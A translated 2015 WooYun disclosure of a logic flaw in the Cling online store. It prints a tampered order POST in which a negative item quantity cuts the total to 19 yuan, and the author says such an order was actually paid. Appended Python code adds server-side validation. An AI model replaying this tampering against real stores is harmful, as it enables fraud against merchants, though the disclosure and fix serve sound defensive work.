
Vulnerability summary

Defect ID: wooyun-2015-0161610

Title: Logic flaw in the Cling (翰临科技) online store allows buying watches and wristbands at a low price~

Vendor: 海翰临科技

Author: 路人甲

Submitted: 2015-12-18 17:08

Fix deadline: 2016-01-28 17:10

Published: 2016-01-28 17:10

Vulnerability type: Design flaw / logic error

Severity: Medium

Self-assessed rank: 8

Status: Vendor could not be contacted, or vendor actively ignored the report

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2015-12-18: Actively contacting the vendor and waiting for the vendor to claim the report; details not disclosed publicly
2016-01-28: The vendor has actively ignored the vulnerability; details disclosed to the public

Brief description:

A logic flaw in the Cling (翰临科技) online store allows buying watches and wristbands at a low price, including the heart-rate-capable ones~~

Detailed description:

http://store.hicling.com/


After adding items to the cart, you can intercept the request and change the item quantity. Only the quantity needs to be changed; the total price and everything else are recalculated automatically on the server.

Screenshot: 修改商品数量.png (modifying the item quantity)


I bought one wristband at 1198, one charging dock at 79, and (-10) straps at 128, plus 22 shipping, for a total of 1198+79+(-10)*128+22 = 19 yuan; the order was submitted successfully and paid.
The POST body submitted at cart confirmation is as follows:

POST /order/confirm HTTP/1.1
Host: store.hicling.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn
Accept-Encoding: gzip, deflate
Origin: http://store.hicling.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_2) AppleWebKit/601.3.9 (KHTML, like Gecko) Version/9.0.2 Safari/601.3.9
Referer: http://store.hicling.com/Order/Address
Cookie: xxxxx
Content-Type: application/x-www-form-urlencoded
Content-Length: 3147
OrderAmount=3&OrderItems=[
{
"Id": 1,
"ProductId": 80009,
"Title": "{\"zhcn\":\"Cling 红枫\",\"enus\":\"Cling Maple\"}",
"EnCode": "maple",
"Image": "http://file.hicling.com/pictures/sys/others/7c759c74a15a435c984936dee0b2e6ee_c_200x200.png",
"Color": null,
"ColorValue": null,
"Number": "200-0023",
"Count": 1,
"Stock": 87,
"Price": "{\"zhcn\": \"1198.00\",\"enus\":\"1198.00\"}",
"MarketPrice": "{\"zhcn\": \"1198.00\",\"enus\":\"1198.00\"}",
"ExpressFee": 10,
"Size": " ",
"BuyWay": null
},
{
"Id": 2,
"ProductId": 80001,
"Title": "{\"zhcn\":\"缤纷腕带(单品)\",\"enus\":\"Color Wristband\"}",
"EnCode": "strap",
"Image": "http://file.hicling.com/pictures/sys/others/f80a44416d874b31b92434f077aacf47_c_200x200.jpg",
"Color": "{'zhcn':'本色黑','enus':'黑'}",
"ColorValue": "#000000",
"Number": "200-0011",
"Count": -10,
"Stock": 465,
"Price": "{\"zhcn\": \"128.00\",\"enus\":\"128.00\"}",
"MarketPrice": "{\"zhcn\": \"128.00\",\"enus\":\"128.00\"}",
"ExpressFee": 10,
"Size": " ",
"BuyWay": null
},
{
"Id": 3,
"ProductId": 80003,
"Title": "{\"zhcn\":\"Cling 便携充电座\",\"enus\":\"Cling Charger\"}",
"EnCode": "cling_charger",
"Image": "http://file.hicling.com/pictures/sys/others/e027ce6898574d57a5349cfde92e57f0_c_200x200.jpg",
"Color": null,
"ColorValue": null,
"Number": "200-0022",
"Count": 1,
"Stock": 444,
"Price": "{\"zhcn\": \"79.00\",\"enus\":\"79.00\"}",
"MarketPrice": "{\"zhcn\": \"79.00\",\"enus\":\"79.00\"}",
"ExpressFee": 10,
"Size": " ",
"BuyWay": null
}
]&OrderTotalPrice=1405.00&OrderUserId=5098662&AddressId=13486&OrderAddress={
"Id": xxx,
"UserId": xxxx,
"Location": "CN",
"Province": "xx",
"City": "xxx",
"District": "xxxx",
"PostCode": "xxx",
"Address": "xxxx",
"ReciverName": "levin",
"PhoneNumber": "13812341234",
"TelPhone": "",
"NoticeEmail": null,
"IsDefault": 1
}&AddressCity=xxx&AddressProvince=xxxx&AddressDistrict=xxx


Only the item quantity needs to be changed; the price and the rest update automatically after submission~~
Heh, the order has been submitted and I have paid; you wouldn't refuse to ship it, would you~~

Proof of vulnerability:

After modifying and resending the packet, the confirmation returned is as follows:

Screenshot: 屏幕快照 2015-12-15 下午8.07.12.png (order confirmation)


Screenshot of the successful payment:

Screenshot: 屏幕快照 2015-12-15 下午8.08.55.png (payment completed)

Suggested fix:

All parameters must be validated. I haven't tested the other parameters, but your developers should certainly validate all parameters on the server side.

Copyright notice: when reposting, please credit the source: 路人甲@乌云
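The server-side check the fix calls for, as an added example that is not code from the report or from the vendor's store. It assumes a hypothetical catalog keyed by ProductId (prices and stock constructed from the values quoted above), a flat shipping fee, and a request body in the same OrderItems shape as the POST shown; the client-supplied Price, MarketPrice and OrderTotalPrice fields are never used for pricing, and a non-positive or out-of-stock Count rejects the order instead of driving the total negative.

```python
import json
from decimal import Decimal

# Hypothetical server-side catalog keyed by ProductId; prices and stock are
# constructed from the values quoted in this report.
CATALOG = {
    80009: {"price": Decimal("1198.00"), "stock": 87},   # Cling Maple
    80001: {"price": Decimal("128.00"), "stock": 465},   # Color Wristband
    80003: {"price": Decimal("79.00"), "stock": 444},    # Cling Charger
}
SHIPPING_FEE = Decimal("22.00")  # flat fee, as in the report

def naive_total(order_items_json: str) -> str:
    """The flawed behaviour described above: trust Count as sent and sum."""
    total = sum(CATALOG[i["ProductId"]]["price"] * i["Count"]
                for i in json.loads(order_items_json))
    return f"{total + SHIPPING_FEE:.2f}"

def price_order(order_items_json: str) -> str:
    """Hardened version: validate every client-controlled field, then price
    from the catalog only. Client Price/MarketPrice/OrderTotalPrice are ignored.
    Raises ValueError (which json.JSONDecodeError subclasses) on any problem."""
    items = json.loads(order_items_json)
    if not isinstance(items, list) or not items:
        raise ValueError("empty or malformed order")
    total = Decimal("0.00")
    for item in items:
        if not isinstance(item, dict) or item.get("ProductId") not in CATALOG:
            raise ValueError(f"unknown product in {item!r}")
        product_id, count = item["ProductId"], item.get("Count")
        # bool is an int subclass, so exclude it explicitly
        if not isinstance(count, int) or isinstance(count, bool) or count < 1:
            raise ValueError(f"invalid Count {count!r} for product {product_id}")
        if count > CATALOG[product_id]["stock"]:
            raise ValueError(f"insufficient stock for product {product_id}")
        total += CATALOG[product_id]["price"] * count
    return f"{total + SHIPPING_FEE:.2f}"

def check_order(order_items_json: str) -> tuple:
    """Return (accepted, total_or_reason) so rejections can be logged."""
    try:
        return True, price_order(order_items_json)
    except ValueError as exc:
        return False, str(exc)

# Constructed payload mirroring the report: the wristband Count is -10
TAMPERED_ITEMS = json.dumps([{"ProductId": 80009, "Count": 1},
                             {"ProductId": 80001, "Count": -10},
                             {"ProductId": 80003, "Count": 1}])
```

With the tampered payload, naive_total reproduces the 19.00 total from the report, while check_order rejects it and names the offending field, which is also the line worth alerting on in the order service's logs.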


Vulnerability response

Vendor response:

The vendor could not be contacted, or the vendor actively refused.